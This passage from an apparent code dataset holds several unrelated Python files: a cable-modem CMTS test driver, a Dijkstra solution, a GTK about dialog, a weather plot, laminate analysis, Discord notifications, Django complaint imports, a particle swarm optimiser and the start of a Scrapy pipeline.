cmd = 'show running-config | include \"ip address\"'\n output = self.check_output(cmd)\n if gw_ip is None:\n return output\n for line in output.splitlines():\n # each line looks like: ip address ADDR MASK ...; grab addr and mask\n addr, mask = line.split()[2:-1]\n cmts_ip = ipaddress.ip_interface(addr + \"/\" + mask)\n if gw_ip == str(next(cmts_ip.network.hosts())):\n return gw_ip\n assert 0, \"ERROR: Failed to get the CMTS bundle IP\"\n\n def get_qos_parameter(self, cm_mac: str) -> Dict[str, List[dict]]:\n \"\"\"Get the QoS parameters of the CM, grouped by service-flow direction.\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n columns = (\n [ # Renamed columns to keep output backward compatible with legacy tests\n \"Sfid\",\n \"SF_REF\",\n \"Direction\",\n \"Current State\",\n \"Sid\",\n \"Scheduling Type\",\n \"Traffic Priority\",\n \"Maximum Sustained rate\",\n \"Maximum Burst\",\n \"Minimum Reserved rate\",\n \"Peak rate\",\n \"FLAGS\",\n ]\n )\n cmd = f\"show cable modem {cm_mac} qos\"\n qos_response = self.__run_and_return_df(\n cmd=cmd,\n columns=columns,\n index=[\"Sfid\", \"Direction\"],\n skiprows=3,\n skipfooter=0,\n dtype={\"Sid\": \"object\"},\n )\n result = defaultdict(list)\n for key, data in qos_response.to_dict(\"index\").items():\n data.update({\"Sfid\": str(key[0])})\n result[key[1]].append(data)\n return result\n\n def get_mtaip(self, cm_mac: str, mta_mac: Optional[str] = None) -> Optional[str]:\n \"\"\"Get the MTA IP from CMTS\n :param cm_mac: mac address of the CM\n :type cm_mac: string\n :param mta_mac: mta mac address\n :type mta_mac: string\n :return: MTA ip address, or an empty string if not found\n :rtype: string\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n if mta_mac:\n mta_mac = self.get_cm_mac_cmts_format(mta_mac)\n else:\n mta_mac = self.board_mta_mac\n cpe_list = self._show_cable_modem_cpe(cm_mac)\n try:\n mtaip = cpe_list.loc[mta_mac][\"CPE_IP_ADDRESS\"]\n except KeyError:\n logger.error(f\"MTA {mta_mac} is not found on cmts.\")\n mtaip = \"\"\n return mtaip\n\n def get_cmts_type(self) -> str:\n \"\"\"Get the product type of the cmts\n :return: Returns the cmts module type.\n :rtype: string\n \"\"\"\n # Hardcoded for now. Didn't find a place to read this info from terminal yet.\n return \"CC8800\"\n\n def get_cm_mac_domain(self, cm_mac: str) -> str:\n \"\"\"API stub. Not supported on Topvision CC8800\n :param cm_mac: CM mac string. Added for compatibility\n :raises NotImplementedError: always; this is not supported on Topvision\n \"\"\"\n raise NotImplementedError(\"Not supported on Topvision\")\n\n def get_center_freq(self, cm_mac: str) -> int:\n \"\"\"Get center frequency for CM\n :param cm_mac: CM mac address\n :return: CM primary channel center frequency\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem()\n primary_sid = scm.loc[cm_mac][\"PRIMARY_SID\"]\n # Only one ccmts configured for now, so index is hardcoded\n freq_config = self.check_output(\n f'show running-config interface ccmts 1 | include \"cable downstream {primary_sid} frequency\"'\n )\n # E.g. \" cable downstream 1 frequency 440000000 modulation qam256 annex a power-level 25.0\"\n return int(freq_config.split(\" \")[4])\n\n def get_ertr_ipv4(self, mac: str, offset: int = 2) -> Optional[str]:\n \"\"\"Get erouter ipv4 from CMTS\n :param mac: mac address of the cable modem\n :type mac: string\n :param offset: eRouter mac address offset, defaults to 2\n :return: returns ipv4 address of erouter else None\n :rtype: string, None\n \"\"\"\n cpe = self._show_cable_modem_cpe(mac)\n mac = netaddr.EUI(mac)\n # eRouter mac address is offset from the CM mac address (+2 by convention)\n ertr_mac = netaddr.EUI(int(mac) + offset)\n ertr_mac.dialect = netaddr.mac_cisco\n for cpe_mac, cpe_details in cpe.iterrows():\n if cpe_mac == ertr_mac:\n ertr_ipv4 = re.search(\n ValidIpv4AddressRegex, cpe_details[\"CPE_IP_ADDRESS\"]\n )\n if ertr_ipv4:\n return ertr_ipv4.group()\n return None\n\n def get_ertr_ipv6(self, mac: str, offset: int = 2) -> Optional[str]:\n \"\"\"Get erouter ipv6 from CMTS\n :param mac: mac address of the cable modem\n :type mac: string\n :param offset: eRouter mac address offset, defaults to 2\n :return: returns ipv6 address of erouter else None\n :rtype: string, None\n \"\"\"\n cpe = self._show_cable_modem_cpe(mac)\n mac = netaddr.EUI(mac)\n # eRouter mac address is offset from the CM mac address (+2 by convention)\n ertr_mac = netaddr.EUI(int(mac) + offset)\n ertr_mac.dialect = netaddr.mac_cisco\n for cpe_mac, cpe_details in cpe.iterrows():\n if cpe_mac == ertr_mac:\n ertr_ipv6 = re.search(\n AllValidIpv6AddressesRegex, cpe_details[\"CPE_IP_ADDRESS\"]\n )\n if ertr_ipv6:\n return ertr_ipv6.group()\n return None\n\n def is_cm_bridged(self, mac: str, offset: int = 2) -> bool:\n \"\"\"Check if the modem is in bridge mode\n :param mac: mac address of the modem\n :param offset: eRouter mac address offset, defaults to 2\n :return: True if the modem is in bridge mode, False otherwise.\n :rtype: boolean\n \"\"\"\n\n cpe = self._show_cable_modem_cpe(mac)\n mac = netaddr.EUI(mac)\n # eRouter mac address is offset from the CM mac address (+2 by convention)\n ertr_mac = netaddr.EUI(int(mac) + offset)\n ertr_mac.dialect = netaddr.mac_cisco\n return all(cpe_mac != ertr_mac for cpe_mac, _ in cpe.iterrows())\n\n def _get_current_time(self, fmt: str = \"%Y-%m-%dT%H:%M:%S%z\") -> str:\n \"\"\"used for unittests\"\"\"\n output = self.check_output(\"show sys-date\")\n # TODO: get the timezone as well\n pattern = r\"\\d{4}-(?:0[1-9]|1[0-2])-(?:0[1-9]|[1-2]\\d|3[0-1]) (?:[0-1]\\d|2[0-3]):[0-5]\\d:[0-5]\\d\"\n time_now = re.search(pattern, output)\n if time_now:\n return datetime.strptime(time_now.group(0), \"%Y-%m-%d %H:%M:%S\").strftime(\n fmt\n )\n else:\n raise CodeError(\"Failed to get CMTS current time\")\n\n @CmtsTemplate.connect_and_run\n def get_current_time(self, fmt: str = \"%Y-%m-%dT%H:%M:%S%z\") -> str:\n \"\"\"Returns the current time on the CMTS\n This is a full override as the topvision device is a little \"different\"\n NOTE: this is missing the timezone\n :return: the current time as a string formatted as \"YYYY-MM-DD hh:mm:ss\"\n :raises CodeError: if anything went wrong in getting the time\n \"\"\"\n return self._get_current_time(fmt=fmt)\n\n @CmtsTemplate.connect_and_run\n def ping(self, ping_ip: str, ping_count: int = 4, timeout: int = 4) -> bool:\n \"\"\"Ping the device from cmts\n :param ping_ip: device ip which needs to be pinged.\n :param ping_count: optional. Number of ping packets.\n :param timeout: optional, seconds. Timeout for each packet.
:return: True if all ping packets passed, else False\n \"\"\"\n return super().ping(ping_ip=ping_ip, ping_count=ping_count, timeout=timeout)\n\n def tcpdump_capture(\n self,\n fname: str,\n interface: str = \"any\",\n additional_args: Optional[str] = None,\n ) -> None:\n \"\"\"Capture packets from specified interface\n\n Packet capture using tcpdump utility at a specified interface.\n\n :param fname: name of the file where packet captures will be stored\n :type fname: str\n :param interface: name of the interface, defaults to \"any\"\n :type interface: str, optional\n :param additional_args: additional arguments to the tcpdump executable, defaults to None\n :type additional_args: Optional[str], optional\n :yield: process id of tcpdump process\n :rtype: None\n \"\"\"\n\n if not self.__router:\n raise NotImplementedError(\n \"CMTS does not support tcpdump, mini cmts router is required for tcpdump\"\n )\n\n # note: the capture always runs on the router's DUT-facing interface,\n # not on the interface argument passed in above\n return self.__router.tcpdump_capture(\n fname=fname,\n interface=self.__router.iface_dut,\n additional_args=additional_args,\n )\n\n def tcpdump_read_pcap(\n self,\n fname: str,\n additional_args: Optional[str] = None,\n timeout: int = 30,\n rm_pcap: bool = False,\n ) -> str:\n \"\"\"Read packet captures using tcpdump from a device given the file name\n\n :param fname: name of file to read from\n :type fname: str\n :param additional_args: filter to apply on packet display, defaults to None\n :type additional_args: Optional[str], optional\n :param timeout: time for tcpdump read command to complete, defaults to 30\n :type timeout: int, optional\n :param rm_pcap: if True remove packet capture file after read, defaults to False\n :type rm_pcap: bool, optional\n :return: console output from the command execution\n :rtype: str\n \"\"\"\n\n if not self.__router:\n raise NotImplementedError(\n \"CMTS does not support tcpdump, mini cmts router is required for tcpdump\"\n )\n\n return self.__router.tcpdump_read_pcap(\n fname=fname,\n additional_args=additional_args,\n timeout=timeout,\n rm_pcap=rm_pcap,\n )\n\n def tshark_read_pcap(\n self,\n fname: str,\n additional_args: Optional[str] = None,\n timeout: int = 30,\n rm_pcap: bool = False,\n ) -> str:\n \"\"\"Read packet captures from an existing file\n\n :param fname: name of the file in which captures are saved\n :type fname: str\n :param additional_args: additional arguments for tshark command to display filtered output, defaults to None\n :type additional_args: Optional[str], optional\n :param timeout: time out for tshark command to be executed, defaults to 30\n :type timeout: int, optional\n :param rm_pcap: if True remove the packet capture file after reading it, defaults to False\n :type rm_pcap: bool, optional\n :return: console output of the tshark read command\n :rtype: str\n \"\"\"\n\n if not self.__router:\n raise NotImplementedError(\n \"CMTS does not support tcpdump, mini cmts router is required for tcpdump\"\n )\n\n return self.__router.tshark_read_pcap(\n fname=fname,\n additional_args=additional_args,\n timeout=timeout,\n rm_pcap=rm_pcap,\n )\n\n def ip_route(self) -> str:\n \"\"\"Execute the ip route command on the cmts router and return its output.\n\n :return: ip route output from the router object\n :rtype: str\n \"\"\"\n return self._mini_cmts_router.ip_route()\n\n def _get_cm_docsis_provisioned_version(self, mac_address: str) -> float:\n \"\"\"Get docsis version of CM.\n\n :param mac_address: mac address of the cm\n :type mac_address: str\n :return: Docsis version of the cm\n :rtype: float\n :raises CodeError: Failed to get docsis version\n \"\"\"\n mac_address = self.get_cm_mac_cmts_format(mac_address)\n self.sendline(f\"show cable modem {mac_address} doscis version\")\n self.expect(self.prompt)\n out = self.before\n result = re.search(r\"DOCSISv(\\d\\.\\d)\", out)\n # guard against a missing match before dereferencing it\n if not result:\n raise CodeError(\"Failed to get Docsis version\")\n return float(result.group(1))\n\n def _get_cm_channel_bonding_detail(self, mac_address: str) -> dict[str, list[str]]:\n \"\"\"Get the list of primary channels.\n\n :param mac_address: mac address of the cm\n :type mac_address: str\n :return: upstream and downstream channel list\n :rtype: dict[str, list[str]]\n :raises CodeError: Failed to get the channel values\n \"\"\"\n mac_address = self.get_cm_mac_cmts_format(mac_address)\n self.sendline(f\"show cable modem {mac_address} primary-channel\")\n self.expect(self.prompt)\n out = self.before\n result = re.findall(r\"\\d\\([\\d\\,]+\\)\", out)\n if len(result) != 2:\n raise CodeError(f\"Failed to get Upstream & Downstream values:\\n {result}\")\n return dict(zip([\"US\", \"DS\"], [re.findall(r\"\\d+\", i) for i in result]))\n\n\ndef print_dataframe(dataframe: pd.DataFrame, column_number=15):\n \"\"\"Util method to pretty print dataframes to log. Has nothing to do with CMTS itself.\n :param dataframe: dataframe to print\n :param column_number: number of columns to print in one row\n \"\"\"\n if dataframe.index.names != [None]:\n index_column_name = [\"(\" + \", \".join(dataframe.index.names) + \")\"]\n else:\n index_column_name = [\"INDEX\"]\n start_column = 0\n columns_number = len(dataframe.columns)\n end_column = column_number if columns_number > column_number else columns_number\n while start_column != columns_number:\n table_headers = (\n index_column_name + dataframe.columns[start_column:end_column].to_list()\n )\n logger.debug(\n \"\\n\"\n + tabulate(\n dataframe.loc[:, dataframe.columns[start_column:end_column]],\n tablefmt=\"psql\",\n headers=table_headers,\n )\n )\n start_column = end_column\n end_column = (\n end_column + column_number\n if columns_number - end_column > column_number\n else columns_number\n )\n","sub_path":"boardfarm_docsis/devices/topvision_cmts.py","file_name":"topvision_cmts.py","file_ext":"py","file_size_in_byte":32609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"17955358","text":"import heapq\n\ndef dijkstra(nodes, edges):\n graph = [[]]\n for _ in range(nodes):\n graph.append([])\n for _ in range(edges):\n a, b, length = map(int, input().rstrip().split())\n graph[a].append((b, length))\n graph[b].append((a, length))\n paths = {}\n q = []\n q.append((0, None, 1))\n while len(q) > 0:\n length, prev, cur = heapq.heappop(q)\n if cur not in paths:\n paths[cur] = (prev, length)\n for to, tolength in graph[cur]:\n if to not in paths:\n heapq.heappush(q, (tolength+length, cur, to))\n if nodes in paths:\n path = [nodes]\n cur = paths[nodes][0]\n while cur is not None:\n path.append(cur)\n cur = paths[cur][0]\n path.reverse()\n print(' '.join(map(str, path)))\n else:\n print(-1)\n\ndef main():\n nodes, edges = map(int, input().rstrip().split())\n dijkstra(nodes, edges)\n\nif __name__ == '__main__':\n main()\n","sub_path":"codeforces/0016/20C.py","file_name":"20C.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"326238718","text":"# -*- coding: utf-8 -*-\n\n__all__ = ['AboutDialog']\n\nimport pygtk\npygtk.require('2.0')\nimport 
gtk\nfrom gnome import url_show\nimport lib.common as common\nfrom lib import i18n\n\nTRANSLATORS = _(\"translator-credits\")\n\ngtk.about_dialog_set_url_hook(lambda dialog, url, data: url_show(url), None)\n\nclass AboutDialog(gtk.AboutDialog):\n \"\"\"\n About dialog class.\n \"\"\"\n def __init__(self, parent=None):\n gtk.AboutDialog.__init__(self)\n\n # Set up the UI\n self._initialize_dialog_widgets()\n self.set_icon_from_file(common.APP_ICON)\n\n def _initialize_dialog_widgets(self):\n self.set_name(common.APPNAME)\n self.set_version(common.APPVERSION)\n self.set_copyright(common.COPYRIGHTS)\n self.set_logo(gtk.gdk.pixbuf_new_from_file(common.APP_HEADER))\n self.set_translator_credits(TRANSLATORS)\n self.set_license(common.LICENSE)\n self.set_website(common.WEBSITE)\n self.set_website_label(_(\"BillReminder Website\"))\n self.set_authors(common.AUTHORS)\n self.set_artists(common.ARTISTS)\n\n # Show all widgets\n self.show_all()\n","sub_path":"src/gui/aboutdialog.py","file_name":"aboutdialog.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"543518132","text":"\nimport matplotlib.pyplot as plt\nimport csv\nfrom datetime import datetime\n\n\nopen_file = open('sitka_weather_2018_simple.csv', 'r')\nfilename = open('death_valley_2018_simple.csv', 'r')\n\ncsv_file = csv.reader(open_file, delimiter = ',')\nfile = csv.reader(filename, delimiter = ',')\n\nheader_row = next(csv_file)\nheader = next(file)\n\nmydate = datetime.strptime('2018-07-01', '%Y-%m-%d')\nprint(type(mydate))\n\ndates = []\nhighs = []\nlows = []\n\n\ndates2 = []\nhighs2 = []\nlows2 = []\n\nfor row in csv_file:\n highs.append(int(row[5]))\n lows.append(int(row[6]))\n the_date = datetime.strptime(row[2], '%Y-%m-%d')\n dates.append(the_date)\n\nfor row in file:\n try:\n the_date = datetime.strptime(row[2], '%Y-%m-%d')\n high = int(row[4])\n low = int(row[5])\n except ValueError:\n print(f'Missing data for {the_date}')\n else:\n highs2.append(high)\n lows2.append(low)\n dates2.append(the_date)\n\n\nfig = plt.figure()\n\nplt.subplot(2,1,1)\nplt.tick_params(axis = \"both\", which = 'major', labelsize = 12)\nplt.plot(dates, highs, c = 'red', alpha = 0.5)\nplt.plot(dates, lows, c = 'blue', alpha = 0.5)\nplt.fill_between(dates, highs, lows, facecolor = 'blue', alpha = 0.1)\nplt.title('SITKA AIRPORT, AK US')\n\nplt.subplot(2,1,2)\nplt.tick_params(axis = \"both\", which = 'major', labelsize = 12)\nplt.plot(dates2, highs2, c = 'red', alpha = 0.5)\nplt.plot(dates2, lows2, c = 'blue', alpha = 0.5)\nplt.fill_between(dates2, highs2, lows2, facecolor = 'blue', alpha = 0.1)\nplt.title('DEATH VALLEY, CA US')\n\nplt.suptitle(\"Temperature comparison between SITKA AIRPORT, AK US and DEATH VALLEY, CA US\")\n\nfig.autofmt_xdate()\n\nplt.show()\n\n\n\n","sub_path":"sitka5.py","file_name":"sitka5.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"286088391","text":"\r\nfrom laminate_analysis_1 import *\r\nfrom Lamina import Lamina\r\nfrom Laminate import Laminate\r\nfrom laminate_Tools import *\r\n\r\nif __name__ == \"__main__\":\r\n\tthick = 0.00272/12\r\n\tfv = 0.4705\r\n\tf = Fibre(23e10 ,15e9 , 24e9 ,vf12 = 0.279 ,density = 0 , Xt = 49e8 ,Xc = 441e7 ,\\\r\n\t\t\t\tYt = 0 ,Yc = 0 , S = 49e8 )\r\n\t\r\n\tm = Matrix(Em = 3e9 , Gm= 1.15e9 , vm = 0.3 ,density = 0 ,Xt = 70e6,Xc = 85e6 ,\\\r\n\t\t\t\tYt = 0 ,Yc = 0 , S = 45e6 )\r\n\r\n\ta0 = Lamina(angle = 
0 ,thickness= thick )\r\n\ta0.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\ta0.Chamis_Model()\r\n\r\n\ta45 = Lamina(angle = 45 ,thickness= thick )\r\n\ta45.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\ta45.Chamis_Model()\r\n\r\n\ta_45 = Lamina(angle = -45 ,thickness= thick )\r\n\ta_45.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\ta_45.Chamis_Model()\r\n\r\n\tb30 = Lamina(angle = 30 ,thickness= thick )\r\n\tb30.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tb30.Chamis_Model()\r\n\r\n\tb_30 = Lamina(angle = -30 ,thickness= thick )\r\n\tb_30.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tb_30.Chamis_Model()\r\n\r\n\tc15 = Lamina(angle = 15 ,thickness= thick )\r\n\tc15.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tc15.Chamis_Model()\r\n\r\n\tc_15 = Lamina(angle = -15 ,thickness= thick )\r\n\tc_15.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tc_15.Chamis_Model()\r\n\r\n\tLA = Laminate(degradation = 1e-9)\r\n\tLA.add_Lamina(a45)\r\n\tLA.add_Lamina(a_45)\r\n\r\n\tLA.add_Lamina(b30)\r\n\tLA.add_Lamina(b_30)\r\n\r\n\tLA.add_Lamina(c15)\r\n\tLA.add_Lamina(c_15)\r\n\tLA.add_Lamina(c_15)\r\n\tLA.add_Lamina(c15)\r\n\r\n\tLA.add_Lamina(b_30)\r\n\tLA.add_Lamina(b30)\r\n\r\n\tLA.add_Lamina(a_45)\r\n\tLA.add_Lamina(a45)\r\n\r\n\tLA.update()\r\n\r\n\tprint(LA.Ex ,LA.Ey )\r\n\r\n\tprint( a45.E1 , a45.E2 , a45.G12 , a45.v12 , a45.v21 )\r\n\tprint( a45.Xt , a45.Xc , a45.Yt , a45.Yc , a45.S )\r\n\tprint( a0.Xt , a0.Xc , a0.Yt , a0.Yc , a0.S )\r\n\r\n\t# Force = Loading(F = [419830 ,0 ,0 ,0 ,0, 0])\r\n\t# Force.apple_to(LA)\r\n\t\t\r\n\t# print( '\\n\\n',Force.laminate_stresses_xy)\r\n\r\n\tlaminate_step_failure(LA , F = [0 ,1 ,0 ,0 ,0, 0] ,layer_num = 5, ply = 1 ,\\\r\n\t\tMax_Load = 1e10 , display = 0,Fc = \"Tsai_Wu\")\r\n\r\n\tLA.update()\r\n\tprint(LA.Ex ,LA.Ey )\r\n\r\n\t# Criterion = Failure_Criterion()\r\n\t# Criterion.Tsai_Wu(Force)\r\n\t# print( Criterion.ret_list)\r\n\r\n\t# plot_stress(Force,max_ten = 0,mode = 'xy',mode2 = 'x')\r\n\t# plot_strain(Force,mode = 'xy',max_ten = None,mode2 = 'x')\r\n","sub_path":"code/Hand_Made_Chamis_Lamina_data.py","file_name":"Hand_Made_Chamis_Lamina_data.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"282285802","text":"\nfrom typing import List\nfrom app.models.discord import Discord\nfrom app.models.history import History, Plataform\nfrom app.models.risk_model import Risk\nfrom app.models.segment import Segment\nfrom app.services import discord_service, history_service\nfrom app.utils import discord_webhook\nfrom app.utils.downloadImage import downloader_file\nfrom app.utils.riskText import riskColor\ndef write_segments_risk(risk: Risk, segments: List[Segment], user: str):\n #Obtain Discord Webhooks\n item_discord = []\n for i_segment in segments:\n item_discord.extend(\n discord_service.get_by_segment(\n Discord(segment=i_segment.name, name=\"\", channel_webhook=\"\")\n )\n )\n if item_discord != []:\n #Prepare notification\n initResponse = riskColor(risk.risk)\n text='{} {} Reporte en: {}. '.format(initResponse,risk.detail,risk.site)\n # text_en = '{} {} Report from: {}. 
'.format(initResponse,risk.detail,risk.site)\n finalMessage= text + risk.gps\n for discord in item_discord:\n response = discord_webhook.send_message(discord.channel_webhook, finalMessage,risk.imageBinary, risk.imageContentType, risk.imageFilename)\n log = History()\n log.username_insert = user\n log.plataform = Plataform.discord\n log.request_payload = text\n log.response_code = response.status_code\n log.response_text = response.text\n log.image = risk.image\n log.activator = write_segments_risk.__name__\n history_service.create(log)","sub_path":"app/backgroud/risk_notify.py","file_name":"risk_notify.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"357294948","text":"class Node:\n def __init__(self, data, next):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def add_at_front(self, data):\n self.head = Node(data, self.head)\n\n def add_at_end(self, data):\n if not self.head:\n self.head = Node(data, None)\n return\n curr = self.head\n while curr.next:\n curr = curr.next\n curr.next = Node(data, None)\n\n def get_last_node(self):\n n = self.head\n while (n.next != None):\n n = n.next\n return n.data\n\n def is_empty(self):\n return self.head == None\n\n def print_list(self):\n n = self.head\n while n != None:\n print(n.data, end=\" => \")\n n = n.next\n print()\n\n\ns = LinkedList()\ns.add_at_front(5)\ns.add_at_end(8)\ns.add_at_front(9)\n\ns.print_list()\nprint(s.get_last_node())","sub_path":"Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"363634513","text":"# -*- coding: utf-8 -*-\nimport logging, datetime, re, os\n\nimport xlrd\n\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.utils.http import urlquote\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django import forms\n\nfrom settings import UPLOAD_PATH \nfrom models import Complaint\n\nimport util\nfrom util import *\n\n@login_required\ndef index(request):\n return render_to_response('iim/complaint_index.html',locals(),context_instance=RequestContext(request))\n\n@login_required\ndef get_list(request):\n queryset = Complaint.objects.all()\n return page_to_res(request, queryset)\n\n\n@login_required\ndef get(request,qid):\n obj = Complaint.objects.get(pk=qid)\n return info2json(obj, request)\n\n@login_required\ndef add(request):\n class Form(forms.ModelForm):\n class Meta:\n model = Complaint \n exclude = ('update_on','closed_on')\n form = Form(request.POST)\n if form.is_valid():\n complaint = form.save(commit=False)\n complaint.update_on = datetime.datetime.now()\n complaint.save()\n return info2json(complaint, request)\n else:\n return err2json(form.errors)\n\n#@permission_required_json('iim.delete_cqt')\n@login_required\ndef delete(request, qid):\n complaint = Complaint.objects.get(pk = qid)\n complaint.delete()\n ret = {\n 'success':True,\n }\n return HttpResponse(json.dumps(ret), mimetype='application/json')\n\n@csrf_exempt\n@login_required\ndef merge(request):\n if request.method == 'POST':\n f = request.FILES['complaint_file']\n data = f.read()\n f.close()\n wb = xlrd.open_workbook(file_contents=data)\n sh = 
wb.sheet_by_name('import')\n nr = sh.nrows\n logging.debug(nr)\n for i in xrange(1,nr):\n complaint = Complaint()\n order = sh.cell_value(rowx=i,colx=0)\n logging.debug(order)\n try:\n com = Complaint.objects.get(order = order) # prevent duplicate complaint work orders\n if sh.cell_value(rowx=i, colx=5):\n com.source = sh.cell_value(rowx=i, colx=7)\n com.closed_on = xlrd2date(sh.cell_value(rowx=i, colx=5))\n com.update_on = datetime.datetime.now()\n com.save()\n except Complaint.DoesNotExist:\n site_id = int(sh.cell_value(rowx=i, colx=1))\n try:\n PhysicalSite.objects.get(id = site_id) \n complaint.order = order\n complaint.site_id = site_id\n complaint.subject = sh.cell_value(rowx=i, colx=2)\n complaint.content = sh.cell_value(rowx=i, colx=3)\n complaint.create_on = xlrd2date(sh.cell_value(rowx=i, colx=4))\n complaint.closed_on = xlrd2date(sh.cell_value(rowx=i, colx=5))\n complaint.tech = sh.cell_value(rowx=i, colx=6)\n complaint.source = sh.cell_value(rowx=i, colx=7)\n complaint.update_on = datetime.datetime.now()\n complaint.save()\n except PhysicalSite.DoesNotExist: # skip unknown site IDs\n pass\n ret = {\n 'success':True,\n }\n return HttpResponse(json.dumps(ret), mimetype='text/html')\n","sub_path":"iim/complaint.py","file_name":"complaint.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"226950491","text":"import os\nfrom setuptools import setup, find_packages\n\ndef read_file(name):\n    return open(os.path.join(os.path.dirname(__file__), name)).read()\n\nreadme = read_file('README.txt')\ndoc = read_file(os.path.join('src', 'cykooz', 'title', 'title.txt'))\nchanges = read_file('CHANGES.txt')\n\nsetup(\n\tname='cykooz.title',\n\tversion='1.0.0',\n\tauthor='Cykooz',\n\tauthor_email='saikuz@mail.ru',\n\tdescription='Adapters for adapting any object to ITitle interface.',\n\tlong_description='\\n\\n'.join([readme, doc, changes]),\n\tlicense='ZPL',\n\tkeywords='zope3',\n\turl='https://bitbucket.org/cykooz/cykooz.title',\n\tclassifiers=[\n\t\t'Development Status :: 4 - Beta',\n\t\t'Environment :: Web Environment',\n\t\t'Intended Audience :: Developers',\n\t\t'Framework :: Zope3',\n\t\t'License :: OSI Approved :: Zope Public License',\n\t\t'Programming Language :: Python',\n\t\t'Natural Language :: English',\n\t\t'Operating System :: OS Independent',\n\t\t'Topic :: Internet :: WWW/HTTP'\n\t\t],\n\tpackages=find_packages('src'),\n\tinclude_package_data=True,\n\tpackage_dir={'':'src'},\n\tnamespace_packages=['cykooz'],\n\textras_require=dict(\n\t\ttest=[\n\t\t\t'zope.app.testing',\n\t\t\t],\n\t\t),\n\tinstall_requires=[\n\t\t'distribute',\n\t\t'zope.component',\n\t\t'zope.container',\n\t\t'zope.interface',\n\t\t'zope.dublincore',\n 'zope.i18n',\n\t\t'zope.i18nmessageid',\n\t\t],\n\tzip_safe=False,\n)\n","sub_path":"pypi_install_script/cykooz.title-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"232925524","text":"import numpy as np\r\nfrom function_rastrigin import error, grad_error\r\n\r\n\r\nclass Particle:\r\n\r\n    def __init__(self, dim, minx, maxx):\r\n        self.position = np.random.uniform(low=minx, high=maxx, size=dim)\r\n        self.velocity = np.random.uniform(low=minx, high=maxx, size=dim)\r\n        self.best_part_pos = self.position.copy()\r\n\r\n        self.error = error(self.position)\r\n        self.best_part_err = self.error.copy()\r\n\r\n    def setPos(self, pos):\r\n        self.position = pos\r\n        self.error = error(pos)\r\n 
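# update the particle's personal best if the new position improves on it\r\n 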
if self.error < self.best_part_err:\r\n self.best_part_err = self.error\r\n self.best_part_pos = pos\r\n\r\n\r\nclass PSO:\r\n w = 0.729\r\n c1 = 1.49445\r\n c2 = 1.49445\r\n lr = 0.01\r\n\r\n def __init__(self, dims, numOfBoids, numOfEpochs):\r\n self.swarm_list = [Particle(dims, -500, 500) for i in range(numOfBoids)]\r\n self.numOfEpochs = numOfEpochs\r\n\r\n self.best_swarm_position = np.random.uniform(low=-500, high=500, size=dims)\r\n self.best_swarm_error = 1e80 # initialise the best swarm error to a very large value\r\n\r\n def optimize(self):\r\n for i in range(self.numOfEpochs):\r\n\r\n for j in range(len(self.swarm_list)):\r\n\r\n current_particle = self.swarm_list[j] # get current particle\r\n\r\n Vcurr = grad_error(current_particle.position) # gradient of the error at the current position, used as the velocity term\r\n\r\n deltaV = self.w * Vcurr \\\r\n + self.c1 * (current_particle.best_part_pos - current_particle.position) \\\r\n + self.c2 * (self.best_swarm_position - current_particle.position) # calculate delta V\r\n\r\n new_position = self.swarm_list[j].position - self.lr * deltaV # calculate the new position\r\n\r\n self.swarm_list[j].setPos(new_position) # update the position of the particle\r\n\r\n if error(new_position) < self.best_swarm_error: # check whether this position is the best for the whole swarm\r\n self.best_swarm_position = new_position\r\n self.best_swarm_error = error(new_position)\r\n\r\n print('Epoch: {0} | Best position: [{1},{2}] | Best known error: {3}'.format(i,\r\n self.best_swarm_position[0],\r\n self.best_swarm_position[1],\r\n self.best_swarm_error))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pso = PSO(2, 30, 50)\r\n pso.optimize()","sub_path":"pso.py","file_name":"pso.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"411513200","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nimport time\nfrom itemadapter import ItemAdapter\nimport pymysql\nfrom twisted.enterprise import adbapi\nfrom .items import QpsItem, QpsCommentItem\n\n\nclass BasePipeline:\n    def process_item(self, item, 